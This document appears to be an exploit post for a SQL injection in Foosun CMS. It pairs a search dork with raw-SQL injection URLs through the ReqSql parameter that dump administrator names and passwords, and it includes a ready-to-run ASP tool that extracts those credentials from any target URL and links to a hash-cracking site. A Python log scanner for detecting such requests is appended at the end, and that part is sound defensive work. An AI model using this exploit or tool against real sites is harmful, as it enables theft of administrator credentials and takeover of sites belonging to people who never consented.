Foosun CMS 0day exploits

Keyword: inurl:User/Reg_service.asp
Foosun's member registration page...
Vulnerable page: /user/SetNextOptions.asp
Exploitation method:
Construct the injection (the ReqSql parameter is passed to the database as raw SQL):
user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
"admin_name" is the field of the database table that holds the administrator user name
user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
"admin_pass_word" is the field of the database table that holds the administrator password
Save the code below as an ASP file and host it in a local ASP environment, and that is all it takes.
<head>
<title>foosun cms 0day exploits</title>
</head>
<body>
<% web = request("web") : id = request("id") %>关键字:会员注册step 1 of 4 step<br>
<form action='' method=post>输入地址:<input type=text size=50 id=web name=web value="<%=web%>"><br>要暴的ID号(默认是1)<input type=text size=3 name=id value="<%=id%>">ID为1的是超级管理员<br><input type=submit value="我要暴"></form>
<form>
<%
' Convert the binary response body to a string (double-byte characters are joined)
function bin2str(bin)
    dim tmp, ustr
    tmp = ""
    for i = 1 to LenB(bin) - 1
        ustr = AscB(MidB(bin, i, 1))
        if ustr > 127 then
            i = i + 1
            tmp = tmp & chr(ustr * 256 + AscB(MidB(bin, i, 1)))
        else
            tmp = tmp & chr(ustr)
        end if
    next
    bin2str = tmp
end function

webuser = web & "User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=" & id
webpass = web & "User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=" & id

if web = "" then
else
    set x = server.createObject("Microsoft.XMLHTTP")
    x.open "get", webuser, false
    x.send
    str = bin2str(x.responseBody)
    response.write "你暴的网站地址:" & web & "<br><br>第" & id & "位的管理员<br>"
    response.write "<br><a href='" & web & "/Admin/login.asp' target=""_blank"">网站后台地址</a><br>"
    ' The returned value starts at a fixed offset in the page body
    for i = 126 to len(str)
        mid1 = mid1 & mid(str, i, 1)
    next
    response.write "<br>------------------<br>帐号:" & mid1 & "<br>"
    x.open "get", webpass, false
    x.send
    str = bin2str(x.responseBody)
    for i = 126 to len(str)
        mid2 = mid2 & mid(str, i, 1)
    next
    response.write "<br>密码:" & mid2 & "<br>------------------<br>"
    response.write "<br>爆出咯,可以YY了<br><br><a href='http://www.cmd5.com' target=""_blank"">cmd5</a>"
    set x = nothing
end if
%>
For the specific exploitation method, refer to the source code.
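From the defender's side, the weakness described above (the ReqSql parameter of SetNextOptions.asp carrying raw SQL) is easy to spot in web server logs. The following is an added example, not code from the original post or from Foosun: it scans constructed, simplified W3C-style access log lines (fields date, time, c-ip, cs-method, cs-uri-stem, cs-uri-query, sc-status are an assumption) and reports every request that passes SQL keywords through ReqSql, together with the tables it references.

```python
import re
from urllib.parse import parse_qs

# Constructed sample log lines (not from a real server); the two ReqSql requests
# mirror the injection URLs described in the post, the other two are benign.
SAMPLE_LOG = """\
2008-05-01 10:00:01 203.0.113.5 GET /user/SetNextOptions.asp sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin 200
2008-05-01 10:00:03 203.0.113.5 GET /User/setnextoptions.asp EquValue=1&ReqSql=select%201,ADMIN_pass_word,3%20from%20FS_MF_ADMIN%20where%20id=1 200
2008-05-01 10:00:09 198.51.100.7 GET /user/SetNextOptions.asp sType=1&EquValue=1&SelectName=city 200
2008-05-01 10:00:12 198.51.100.7 GET /user/Reg_service.asp - 200
"""

VULN_PAGE = "/user/setnextoptions.asp"          # compared case-insensitively
SQL_TOKEN = re.compile(r"\b(select|union|from|where)\b", re.I)
FROM_TABLE = re.compile(r"\bfrom\s+(\w+)", re.I)
ADMIN_TABLE = "fs_mf_admin"                     # the table named in the post


def flag_reqsql(log_text):
    """Return one finding per request that hands SQL to the ReqSql parameter.

    Each finding records when, from where, the decoded SQL, the tables it
    reads from, and whether the administrator table is among them.
    """
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 7:
            continue
        date, time, c_ip, _method, stem, query, status = parts[:7]
        if stem.lower() != VULN_PAGE or query == "-":
            continue
        # parse_qs decodes %xx escapes and '+' so the SQL is readable
        params = parse_qs(query, keep_blank_values=True)
        for sql in params.get("ReqSql", []):
            if not SQL_TOKEN.search(sql):
                continue
            tables = FROM_TABLE.findall(sql)
            findings.append({
                "time": f"{date} {time}", "src": c_ip, "status": status,
                "sql": " ".join(sql.split()), "tables": tables,
                "admin_table": any(t.lower() == ADMIN_TABLE for t in tables),
            })
    return findings


if __name__ == "__main__":
    for f in flag_reqsql(SAMPLE_LOG):
        print(f["time"], f["src"], f["tables"], "ADMIN" if f["admin_table"] else "", f["sql"])
```

A benign use of the endpoint (third line) never reaches the SQL-keyword check, so only requests that actually smuggle a query are reported.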